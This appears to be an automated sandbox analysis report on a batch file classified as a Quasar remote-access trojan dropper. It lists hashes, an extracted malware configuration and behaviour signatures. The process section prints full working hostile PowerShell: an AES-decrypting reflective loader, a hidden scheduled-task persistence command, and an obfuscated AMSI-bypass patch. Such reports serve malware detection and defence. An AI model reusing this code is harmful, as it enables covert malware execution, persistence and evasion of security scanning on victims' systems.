Analysis
-
max time kernel
28s -
max time network
23s -
platform
windows10-1703_x64 -
resource
win10-20240404-en -
resource tags
-
submitted
31-05-2024 22:32
General
-
Target
$sxr-Uni2.bat
-
Size
796KB
-
MD5
03137a8d9aaa39d4266d6cafecc5ccb2
-
SHA1
65ab5f05615d7aeb12a8f64f2339af341172784d
-
SHA256
7fca260b4dbeac5ef0255577b3502e6658ca6661f80ad9583673f656c3e67a64
-
SHA512
a950fe4fcee799aec313c08dc93535f0af463ab3953fb054288230ed30099ff98de5e12a6485e35a11a90a1f41c3043f5270274d29de7ed25c98356015084226
-
SSDEEP
12288:sJOiyoo1m8Y8HvatsI8a0XNQ7UCPWa/9SC+KSXs+kYWjJ4rT+/mq6z4Q4uatxyG:sciyK8YzJ8BwUCPTwC+KysEWjG+D6l4b
Score
10/10
Malware Config
Extracted
Family
quasar
Version
3.1.5
Botnet
Slave
C2
127.0.0.1:4782
Mutex
$Sxr-mRtuuIZppUEbmX171W
Attributes
-
encryption_key
s5xN6p335pnxD0WJMnnQ
-
install_name
$sxr-powershell.exe
-
log_directory
$sxr-Logs
-
reconnect_delay
3000
-
startup_key
Powershell
-
subdirectory
$sxr-seroxen2
Signatures
-
Quasar RAT
Quasar is an open source Remote Access Tool.
-
Quasar payload 1 IoCs
-
Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs
Run Powershell and hide display window.
-
Executes dropped EXE 2 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Modifies data under HKEY_USERS 32 IoCs
-
Modifies registry class 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 10 IoCs
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of WriteProcessMemory 20 IoCs
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\$sxr-Uni2.bat"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('YdrnMYixViSdjvLypkvDjeezo9AbG2F3sYXUntuddvQ='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('IBVidKouSC6beP8nLs4RNg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $sjCYq=New-Object System.IO.MemoryStream(,$param_var); $HKxSP=New-Object System.IO.MemoryStream; $rfbZc=New-Object System.IO.Compression.GZipStream($sjCYq, [IO.Compression.CompressionMode]::Decompress); $rfbZc.CopyTo($HKxSP); $rfbZc.Dispose(); $sjCYq.Dispose(); $HKxSP.Dispose(); $HKxSP.ToArray();}function execute_function($param_var,$param2_var){ $qIGNe=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $ELzZY=$qIGNe.EntryPoint; $ELzZY.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\$sxr-Uni2.bat';$mxwBI=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\$sxr-Uni2.bat').Split([Environment]::NewLine);foreach ($VNnmR in $mxwBI) { if ($VNnmR.StartsWith(':: ')) { $XFJot=$VNnmR.Substring(3); break; }}$payloads_var=[string[]]$XFJot.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));2⤵
- Command and Scripting Interpreter: PowerShell
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_386_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_386.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_386.vbs"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_386.bat" "4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('YdrnMYixViSdjvLypkvDjeezo9AbG2F3sYXUntuddvQ='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('IBVidKouSC6beP8nLs4RNg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $sjCYq=New-Object System.IO.MemoryStream(,$param_var); $HKxSP=New-Object System.IO.MemoryStream; $rfbZc=New-Object System.IO.Compression.GZipStream($sjCYq, [IO.Compression.CompressionMode]::Decompress); $rfbZc.CopyTo($HKxSP); $rfbZc.Dispose(); $sjCYq.Dispose(); $HKxSP.Dispose(); $HKxSP.ToArray();}function execute_function($param_var,$param2_var){ $qIGNe=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $ELzZY=$qIGNe.EntryPoint; $ELzZY.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Roaming\startup_str_386.bat';$mxwBI=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Roaming\startup_str_386.bat').Split([Environment]::NewLine);foreach ($VNnmR in $mxwBI) { if ($VNnmR.StartsWith(':: ')) { $XFJot=$VNnmR.Substring(3); break; }}$payloads_var=[string[]]$XFJot.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\Install.exe"C:\Users\Admin\AppData\Local\Temp\Install.exe"6⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\ResetSurvival.exe"C:\Users\Admin\AppData\Local\Temp\ResetSurvival.exe"6⤵
- Executes dropped EXE
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:QdNAovbFrDBM{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$wkEdfDdRnXwNIT,[Parameter(Position=1)][Type]$EYgdFGuPVp)$eJeFlSxLuiL=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+[Char](101)+''+'f'+''+'l'+''+'e'+'c'+[Char](116)+''+'e'+''+[Char](100)+''+[Char](68)+''+[Char](101)+''+'l'+''+[Char](101)+''+[Char](103)+''+[Char](97)+''+[Char](116)+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+'I'+''+'n'+''+[Char](77)+'e'+[Char](109)+'or'+[Char](121)+''+[Char](77)+'od'+[Char](117)+''+'l'+''+[Char](101)+'',$False).DefineType(''+'M'+''+[Char](121)+'De'+[Char](108)+''+'e'+''+[Char](103)+''+[Char](97)+''+[Char](116)+''+[Char](101)+''+'T'+''+[Char](121)+''+[Char](112)+''+[Char](101)+'','C'+'l'+''+[Char](97)+''+[Char](115)+''+'s'+''+','+''+[Char](80)+''+'u'+''+[Char](98)+''+[Char](108)+''+[Char](105)+''+[Char](99)+''+','+''+'S'+'eal'+'e'+''+[Char](100)+''+[Char](44)+''+'A'+''+'n'+'s'+'i'+''+[Char](67)+''+'l'+'a'+[Char](115)+''+[Char](115)+''+[Char](44)+''+'A'+''+'u'+''+[Char](116)+''+[Char](111)+''+[Char](67)+''+'l'+''+'a'+''+[Char](115)+'s',[MulticastDelegate]);$eJeFlSxLuiL.DefineConstructor(''+[Char](82)+''+'T'+''+'S'+''+'p'+''+[Char](101)+'c'+'i'+''+'a'+'l'+'N'+'a'+[Char](109)+''+[Char](101)+''+[Char](44)+''+'H'+'i'+[Char](100)+''+'e'+'B'+[Char](121)+''+[Char](83)+''+'i'+'g'+[Char](44)+''+'P'+''+[Char](117)+'b'+[Char](108)+''+[Char](105)+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$wkEdfDdRnXwNIT).SetImplementationFlags(''+'R'+''+[Char](117)+''+'n'+''+'t'+''+[Char](105)+''+'m'+''+'e'+''+','+'Ma'+'n'+'a'+'g'+'e'+[Char](100)+'');$eJeFlSxLuiL.DefineMethod('I'+[Char](110)+''+[Char](118)+''+'o'+''+'k'+'e','P'+[Char](117)+''+'b'+''+'l'+''+[Char](105)+''+'c'+''+[Char](44)+''+'H'+''+'i'+''+[Char](100)+''+[Char](101)+'B'+[Char](121)+''+[Char](83)+''+[Char](105)+'g,N'+[Char](101)+''+[Char](119)+''+[Char](83)+''+'l'+'o'+[Char](116)+','+'V'+''+[Char](105)+''+[Char](114)+''+[Char](116)+'u'+[Char](97)+''+'l'+'',$EYgdFGuPVp,$wkEdfDdRnXwNIT).SetImplementationFlags(''+[Char](82)+''+[Char](117)+'n'+[Char](116)+'i'+[Char](109)+'e,Man'+[Char](97)+'g'+[Char](101)+''+[Char](100)+'');Write-Output $eJeFlSxLuiL.CreateType();}$OwMMmzGecQJHF=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+'S'+'y'+'s'+'t'+[Char](101)+''+'m'+''+[Char](46)+''+[Char](100)+''+'l'+''+'l'+'')}).GetType(''+[Char](77)+''+'i'+''+[Char](99)+'r'+'o'+''+[Char](115)+''+[Char](111)+''+'f'+''+'t'+''+'.'+'W'+'i'+''+[Char](110)+''+'3'+'2'+'.'+'U'+[Char](110)+'s'+[Char](97)+''+'f'+''+[Char](101)+''+'N'+''+[Char](97)+'tiv'+[Char](101)+'M'+[Char](101)+''+[Char](116)+''+[Char](104)+''+[Char](111)+''+'d'+''+[Char](115)+'');$kVGGgxPBIolGTb=$OwMMmzGecQJHF.GetMethod(''+'G'+''+[Char](101)+''+[Char](116)+''+[Char](80)+''+[Char](114)+'ocAd'+[Char](100)+''+'r'+'e'+[Char](115)+''+'s'+'',[Reflection.BindingFlags](''+'P'+'u'+[Char](98)+''+[Char](108)+''+[Char](105)+''+[Char](99)+''+[Char](44)+''+[Char](83)+''+[Char](116)+''+[Char](97)+''+[Char](116)+''+[Char](105)+''+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$gojSVSmVrHJnhuFCXFY=QdNAovbFrDBM @([String])([IntPtr]);$AMkskOpksUurSUSGSFLNaN=QdNAovbFrDBM @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$YYWdzlPYrwS=$OwMMmzGecQJHF.GetMethod('Ge'+'t'+''+'M'+''+[Char](111)+''+'d'+''+'u'+''+'l'+''+[Char](101)+''+[Char](72)+''+[Char](97)+'n'+'d'+''+'l'+''+[Char](101)+'').Invoke($Null,@([Object](''+'k'+''+[Char](101)+''+[Char](114)+''+[Char](110)+''+'e'+''+[Char](108)+''+[Char](51)+''+[Char](50)+''+'.'+''+[Char](100)+''+[Char](108)+''+'l'+'')));$oaRJvGfkNutrUZ=$kVGGgxPBIolGTb.Invoke($Null,@([Object]$YYWdzlPYrwS,[Object]('L'+'o'+''+'a'+''+[Char](100)+''+[Char](76)+''+[Char](105)+''+[Char](98)+'r'+[Char](97)+''+'r'+''+[Char](121)+''+'A'+'')));$hmvDzVACQwoDUSvpT=$kVGGgxPBIolGTb.Invoke($Null,@([Object]$YYWdzlPYrwS,[Object]('V'+[Char](105)+''+[Char](114)+'t'+[Char](117)+''+[Char](97)+'lP'+[Char](114)+''+[Char](111)+'t'+'e'+''+[Char](99)+''+[Char](116)+'')));$ENNTbUT=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($oaRJvGfkNutrUZ,$gojSVSmVrHJnhuFCXFY).Invoke(''+[Char](97)+'m'+[Char](115)+''+'i'+'.'+'d'+''+[Char](108)+'l');$LmoqQuxWZrQuJKMcS=$kVGGgxPBIolGTb.Invoke($Null,@([Object]$ENNTbUT,[Object](''+'A'+'ms'+'i'+''+'S'+'ca'+[Char](110)+''+'B'+''+[Char](117)+''+[Char](102)+''+[Char](102)+'e'+'r'+'')));$OgMbMHpSkY=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($hmvDzVACQwoDUSvpT,$AMkskOpksUurSUSGSFLNaN).Invoke($LmoqQuxWZrQuJKMcS,[uint32]8,4,[ref]$OgMbMHpSkY);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$LmoqQuxWZrQuJKMcS,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($hmvDzVACQwoDUSvpT,$AMkskOpksUurSUSGSFLNaN).Invoke($LmoqQuxWZrQuJKMcS,[uint32]8,0x20,[ref]$OgMbMHpSkY);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+'S'+'O'+[Char](70)+''+[Char](84)+''+'W'+'A'+[Char](82)+'E').GetValue('$sx'+[Char](114)+'s'+[Char](116)+''+[Char](97)+''+[Char](103)+''+[Char](101)+''+'r'+'')).EntryPoint.Invoke($Null,$Null)"1⤵
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD5ac3d19fbb5c5f10833f1882308f77548
SHA1ac880466fd99a5719fedc7289b00d78ba7088e06
SHA2563353b90af649198e084632af776f8c6ea3a9302da5a50d85f7ecde1c7ad295df
SHA512b5e6369d7f475e9931d19fb2a5305b4c901ca5fcac5d788d064b6a1b1d6de2034e84932ac243d5056c745b924a2e9537a06b4172fab364402263788c814bc28b
-
Filesize
45KB
MD55f640bd48e2547b4c1a7421f080f815f
SHA1a8f4a743f5b7da5cba7b8e6fb1d7ad4d67fefc6a
SHA256916c83c7c8d059aea295523b8b3f24e1e2436df894f7fae26c47c9bad04baa9c
SHA512a6ac100a351946b1bbb40c98aeda6e16e12f90f81063aff08c16d4d9afec8ed65c2cbcf25b42946627d67653f75740b1137dab625c99e9492ba35aba68b79a8e
-
Filesize
17KB
MD5b443a94a57a7fb2be6fa76b6d7278eea
SHA1d85e1d26fe98d4c196b1e82704eff5d70a98fe20
SHA256292481d5ad73e735b95a6963a88535c77caab85f6445d2fec4014aae4945e657
SHA5121c87e2417f399ff566456b8588b3d191a16029298de6aa1993288d900806a7941b27bfe221e6f46232c3c6420046bb21a3da17ff132d13fc9a484899d90ff8ea
-
Filesize
163KB
MD579e7a0f8ec98e351c491023605881537
SHA1065146d5cbf73fef9d8f43bc9bd761959cb17486
SHA2562b9c94fa4a0091e7be78ec8706b91e2f452b0192e48720dfa6216380b37c81b7
SHA512e0630b588c8926da10b5880ca6f49fba32bd28cbf02b58692bea693fa4ede29a01dba9b4029916e1fcca2e38d447598cffe63cf91705f638a897b131304c20b0
-
Filesize
139KB
MD584231ecf2715509d921283d32351d4cd
SHA1cbb51ee26cb2c50621bbab170ea8696f84800090
SHA256d36b177e6c58e67045da5a607f0b5d74ea56b06220216f5e2046557c8195b0f4
SHA512997af01ae49cbb45857b664f182a912d7a604c18838bf75964228d19a75df0968b16e15a692a577f457e5f2875eb3bd4dca5861744d816dfbb80abc34ce35a81
-
Filesize
1B
MD5c4ca4238a0b923820dcc509a6f75849b
SHA1356a192b7913b04c54574d18c28d46e6395428ab
SHA2566b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA5124dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a
-
Filesize
796KB
MD503137a8d9aaa39d4266d6cafecc5ccb2
SHA165ab5f05615d7aeb12a8f64f2339af341172784d
SHA2567fca260b4dbeac5ef0255577b3502e6658ca6661f80ad9583673f656c3e67a64
SHA512a950fe4fcee799aec313c08dc93535f0af463ab3953fb054288230ed30099ff98de5e12a6485e35a11a90a1f41c3043f5270274d29de7ed25c98356015084226
-
Filesize
115B
MD56ba11f355d4a73b498c6aecb24f0fc61
SHA10be6659d8ff819bb3e81ee0c4238141964febef2
SHA2568b504994e1860b8ff852c0f1b2d9c4e99ea4c0fcb81e12303f26d885ddaec70e
SHA512a3b20fcab150d0af2d7d606497d6f3eb0bbf0452b01de07f8f1ee52345d127236c2e4391cb2fade4ad23369992cd2f9ed347ddc039a9286d2f471bcc2a166d7a
-
Filesize
584KB
-
Filesize
432KB
-
Filesize
72KB
-
Filesize
136KB
-
Filesize
472KB
-
Filesize
6.9MB
-
Filesize
120KB
-
Filesize
6.9MB
-
Filesize
592KB
-
Filesize
6.9MB
-
Filesize
660KB
-
Filesize
6.9MB
-
Filesize
6.9MB
-
Filesize
6.9MB
-
Filesize
204KB
-
Filesize
300KB
-
Filesize
6.9MB
-
Filesize
4KB
-
Filesize
300KB
-
Filesize
6.9MB
-
Filesize
696KB
-
Filesize
32KB
-
Filesize
6.5MB
-
Filesize
6.9MB
-
Filesize
104KB
-
Filesize
4KB
-
Filesize
6.9MB
-
Filesize
472KB
-
Filesize
5.0MB
-
Filesize
112KB
-
Filesize
6.9MB
-
Filesize
3.3MB
-
Filesize
408KB
-
Filesize
408KB
-
Filesize
136KB
-
Filesize
6.9MB
-
Filesize
6.2MB
-
Filesize
6.9MB
-
Filesize
216KB